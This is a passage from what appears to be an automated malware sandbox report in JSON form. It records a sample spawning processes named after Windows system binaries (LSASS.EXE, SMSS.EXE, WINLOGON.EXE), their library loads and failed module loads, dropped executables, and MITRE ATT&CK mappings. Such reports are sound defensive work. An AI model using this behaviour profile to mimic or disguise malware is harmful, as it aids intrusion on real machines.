\"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004036)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001800)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004204)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003820)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003820)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003820)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003256)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003256)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004152)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003232)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001720)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001720)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001720)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001720)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001720)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003424)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003416)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003416)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006080)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003920)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003920)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003920)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003920)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003920)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003920)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003920)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003920)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001416)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004188)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004188)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004188)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004188)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004188)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004188)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004188)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004188)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004188)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003888)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003888)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003888)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003888)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004392)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001884)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001884)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004060)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000884)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000884)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000884)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000884)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000884)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003732)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002160)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001820)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001820)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001748)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001748)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002752)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002752)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002524)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002524)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002524)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002524)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002524)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002524)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"Data HAPUBWS.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"New Folder.exe\" has an executable section named \".text\"\n \"WINLOGON.EXE.bin\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4A6B.bin\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4B2F.bin\" has an executable section named \".text\"\n \"D3_08.EXE.67EE473F.bin\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4741.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"Data HAPUBWS.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"New Folder.exe\" has an writable section named \".data\"\n \"WINLOGON.EXE.bin\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4A6B.bin\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4B2F.bin\" has an writable section named \".data\"\n \"D3_08.EXE.67EE473F.bin\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4741.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75450000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00005856) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00005856) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005856)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002060)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006136)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005952)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006124)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004180)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004284)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004136)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005984)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006048)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003928)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003800)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003456)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002208)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004316)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004036)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001800)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004204)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003820)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003256)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004152)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001720)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003424)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": 